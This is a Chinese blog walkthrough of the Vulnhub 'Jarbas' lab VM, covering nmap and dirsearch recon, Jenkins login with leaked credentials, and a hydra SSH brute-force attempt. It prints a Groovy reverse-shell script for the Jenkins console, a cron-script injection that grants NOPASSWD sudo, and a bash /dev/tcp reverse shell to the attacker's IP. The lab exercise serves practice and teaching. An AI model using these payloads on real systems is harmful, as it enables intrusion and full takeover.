首页 > 其他分享 >Vulnhub Jarbas

Vulnhub Jarbas

时间:2024-11-13 18:21:08浏览次数:1  
标签:bin etc 192.168 231.134 Jarbas while Vulnhub bash

Vulnhub Jarbas

0x01:端口扫描

主机发现

nmap -sn 192.168.231.0/24

image-20241107202849575

全端口详细扫描

nmap -sT -sC -sV -O -p- 192.168.231.134 -oA /root/scan 

image-20241110193535311

发现有3个服务,22ssh,80http,3306mysql,8080http

接下来对http进行漏洞扫描

nmap --script=vuln -p80 192.168.231.134

image-20241107212607636

似乎有csrf和sql注入漏洞

0x02:web渗透

扫目录

dirsearch -u http://192.168.231.134

image-20241107213717707

dirsearch -u http://192.168.231.134:8080

image-20241110195515322

扫到一个access.html,我们访问一下

image-20241110185302570

image-20241110185411448

image-20241110185506210

image-20241110185552288

tiago:italia99
trindade:marianna
eder:vipsu

我们试试ssh

image-20241110190957526

行不通,还记得我们之前扫到了8080的http吗,他是一个登录框,用的是Jenkins,我们尝试登陆一下

image-20241110193737003

最后一个登陆进去了

image-20241110193836026

我们一个一个地看,看到了Build Executor Status

image-20241110194412969

发现他有一台叫做master的linux机器,我们点进去看看

image-20241110195620557

image-20241110201602174

说的是允许我们执行一些Groovy脚本语法

image-20241110202130985

用户名是jenkins,我们hydra爆破一下

hydra -l jenkins -P /usr/share/wordlists/rockyou.txt 192.168.231.134 -t 20 ssh -Vv

-l:用户名

-P:字典路径

-t:线程数

-Vv:输出详情信息

image-20241111081558582

发现爆不出来,我们尝试另一种方法

我们尝试使用这个终端反弹一个shell,直接google搜就行了https://blog.csdn.net/weixin_54227009/article/details/130805973,用这个cli插件反弹

String host="192.168.231.131";
int port=6666;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

image-20241111083510389

0x03:权限提升

首先创建一个好看点的bash

python -c 'import pty ;pty.spawn("/bin/bash");'

image-20241111104248790

先看常规sudo提权

sudo -l

image-20241111083710545

看看suid

find / -type f -perm -04000 -ls 2>/dev/null

-ls:以列表形式显示找到的文件的详细信息,包括权限、大小、修改时间等。

image-20241111084054421

基本上没有啥可以利用的

再看看作业表

cat /etc/crontab

image-20241111084223682

拿到可以利用的文件了,这里有一个作业表,我们尝试利用它提升权限

echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh

image-20241111112826877

sudo /bin/bash

这个需要稍等以下,等他CronJob执行后才能运行

image-20241111113034650

拿到root权限,我们find查找flag

find / -type f -name "flag.txt" 2>/dev/null

image-20241111113257526

0x04:思考补足

看了师傅的wp后发现可以做出以下改动

1.刚开始端口扫描没有扫到8080端口,导致思路受限,以后一定要多扫几遍

2.web渗透呢,有些师傅用的是MSF,我这里也试了一下

image-20241111113848503

用第一个

把options配好,然后运行

image-20241111114337564

但是呢报错了

image-20241111114411542

按照他的提示改好就行了

image-20241111185318868

还有就是在jenkins创建新文件(写马),或者是修改文件

3.提权的话,可以在配置文件中修改来反弹shell提权

bash-4.2$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.231.131/8888 0>&1'" > /etc/script/CleaningScript.sh

标签:bin,etc,192.168,231.134,Jarbas,while,Vulnhub,bash
From: https://www.cnblogs.com/kelec0ka/p/18544514

相关文章

  • Vulnhub W1R3S: 1.0.1
    VulnhubW1R3S:1.0.10x01:端口扫描主机发现,靶机ip:192.168.231.133nmap-sn192.168.231.0/24-sn仅主机扫描/24扫描c段详细全端口扫描nmap-sT-sC-sV-O-p21,22,80,3306192.168.231.133-oA/root/scan/1/-sT:以TCP进行扫描;-sC:使用nmap的默认脚本集合进行......
  • vulnhub-DC-1详细笔记
    1.靶机DC-1和kali开启nat模式2.kali扫描同一子网段的存活主机3.确定了靶机的ip为192.168.137.130,在来一遍详扫4.发现web资产5.使用wapp查看资产6.查看有没有Drupal7的漏洞7.发现有该漏洞,那我们就使用msf利用该漏洞,searchdrupal7查询漏洞,然后一个个尝试编......
  • 打靶记录-Jarbas
    靶机下载vulnhub->Jarbas确定靶机nmap-sn192.168.52.0/24靶机ip:192.168.52.130扫描全端口开放情况nmap-sT192.168.52.130-p--oA./ports详细扫开放的端口nmap-sT-sC-sV-O192.168.52.130-p22,80,3306,8080-oA./details扫udp端口开放nmap-sU--top-po......
  • 【网络安全渗透测试零基础入门】Vulnhub靶机Kioptrix level-4 多种姿势渗透详解,收藏这
    前言这是阳哥给粉丝盆友们整理的网络安全渗透测试入门阶段Vulnhub靶场实战阶段教程喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。环境配置服务版本探测:sudonmap-sT-sV-sC-O-p22,80,139,44522端口ssh服务以及openssh版本其他无特别信息80端口......
  • Narak靶机渗透 (Vulnhub内网渗透)
    一、渗透目标:DescriptionBacktotheTopNarakistheHinduequivalentofHell.YouareinthepitwiththeLordofHellhimself.CanyouuseyourhackingskillstogetoutoftheNarak?Burningwallsanddemonsarearoundeverycornerevenyourtrustytool......
  • Me-and-My-Girlfriend-1靶机渗透 (Vulnhub内网渗透)
    一、Me-and-My-Girlfriend-1:1、渗透目标:Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,wherethecouplewasoriginallyveryromantic,butsinceAliceworkedataprivatecompany,"CebanCorp",somethinghaschan......
  • [ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (附靶机搭建教程)
    ......
  • VulnHub-Brainpan1 靶机笔记
    Brainpan1靶机笔记概述靶机地址:https://vulnhub.com/entry/brainpan-1,51/#download这台靶机是很好的缓冲区溢出漏洞利用的练习靶机,涉及到逆向和缓冲区溢出漏洞挖掘的一些知识。一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oports192.168.11.12Nmapscanre......
  • 玩转vulnhub靶场(非常详细),零基础入门到精通,看这一篇就够了
    前言vulnhub是我们学习网络安全最常用的靶场之一。难易度适中,内容全面。是我们学习的不二选择。本文让我们一起学习吧!声明:本文旨在网络安全学习和研究,坚决反对一切危害网络安全的行为。请务必遵守相关法律法规。下载靶场我们需要登录vulnhub官网对用的靶场。如上,涉及......
  • 【Vulnhub靶场】DC-1
    DC-1靶场下载链接:https://download.vulnhub.com/dc/DC-1.zip目标本机IP:192.168.118.128靶机IP:192.168.118.0/24信息收集通过nmap扫存活主机,得到目标ip,扫出其端口信息及服务nmap-sP192.168.118.0/24nmap-p-192.168.118.138nmap-sV-A192.168.118.138这里......